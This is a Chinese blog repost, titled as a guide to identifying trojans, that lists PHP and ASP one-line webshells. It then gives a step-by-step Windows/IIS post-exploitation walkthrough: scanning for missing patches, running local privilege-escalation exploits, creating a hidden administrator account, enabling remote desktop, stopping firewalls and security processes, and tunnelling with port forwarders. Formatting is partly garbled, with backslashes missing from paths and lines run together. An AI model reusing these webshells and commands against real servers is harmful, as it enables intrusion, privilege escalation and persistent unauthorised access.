2. it
  3. 判别木马

判别木马

mac2022-06-30  103

 

eval (base64_decode($_POST["php"]));

<?php @eval($_POST[sb])?>

 

<%eval request("sb")%>

Eval(Request(chr(35)))

<%ExecuteGlobal request("sb")%>

<?php assert($_POST[sb]);?>//使用lanker一句话客户端的专家模式执行相关的php语句程序代码<?$_POST['sa']($_POST['sb']);?>程序代码<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>程序代码<?php@preg_replace("/[email]/e",$_POST['h'],"error");?>

 

 

systeminfo命令查看下是否有未补丁漏洞,或者通过查询c:windows 里留下的补丁号.log来看看服务器大概打了哪些补丁

 

KB2360937 MS10-084KB2478960 MS11-014KB2507938 MS11-056KB2566454 MS11-062KB2646524 MS12-003KB2645640 MS12-009KB2641653 MS12-018KB944653 MS07-067KB952004 MS09-012   pr

KB956572 MS09-012 巴西烤肉KB971657 MS09-041KB2620712 MS11-097KB2393802 MS11-011  ms11011.exekb942831 MS08-005KB2503665 MS11-046  ms11046.exe

KB2592799 MS11-080  ms11080.exe

没打补丁的话,会被上传恶心的exploit.

当asp不支持WScript时候.而支持aspx的脚本时候就会用aspx,因为Aspx webshell是调用.net的组件来运行cmd命令的.

Aspxspy还有一个反弹的 端口映射

/c C:RECYCLER ms11080.exe 

Pr的使用方法就是 文件所在的路径 + “cmd命令” ps:要注意有””双引号!!.

C:RECYCLER pr.exe "net user xiaoguai h4x0er.com /add & net localgroup administrators xiaoguai /add"

若是执行pr,为什么不回显呢?因为上传的文件的路径 文件夹里面有 空格c:Documents and Settings 所以一般会被放到C:RECYCLER

接着就被查看3389的端口.点击读取注册表,读取HK_L_M SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-TcpPortNumber这个键里面的值.

附录1.

IIS6.0下将webshell提升为system用户权限的方法:进入应用程序池-属性-标识:将标识里面的预定义账号设为:本地系统 (代表webshell具有system用户权限)或者选用那个”IWAM_主机名”用户,再用clone5.exe程序克隆“IWAM_主机名”用户

你可以把“@echo %i Not Installed!” 换成 “%i.exe Parameters“,就可以自动提权了(没换是检测那个漏洞)……

 

systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt

systeminfo>a.txt&(for %i in (KB952004 KB956572 KB2393802 KB2503665 KB2592799 KB2621440 KB2160329 KB970483 KB2124261 KB977165 KB958644) do @type a.txt|@find /i  "%i" ||@echo %i Not Installed!)&del /f /q /a a.txt

 

dir c:windows>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log) do @type a.txt|@find /i “%i”||@echo %i Not Installed!)&del /f /q /a a.txt

 

3.3389连接不上的解决方法如果直接连接连接不上的话,有可能是以下几种情况以及解决方法

1.远程桌面服务没开启可以把REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f保存成bat文件在cmd下找个可写目录然后以system权限运行.2.IP策略阻拦sc stop policyagent3.windows自带防火墙阻拦net stop sharedaccess4.其他防火墙阻拦tasklist /svc此命令可以获取每个进程中主持的服务看到哪个不是系统自带的服务或者正在运行的进程用ntsd -c q -pn xxx.exe 和 net stop 还有sc stop 这几个命令以system权限xx掉它.5.内网可以通过lcx等转发工具.

 

转载于:https://www.cnblogs.com/alex-13/p/3296713.html

最新回复(0)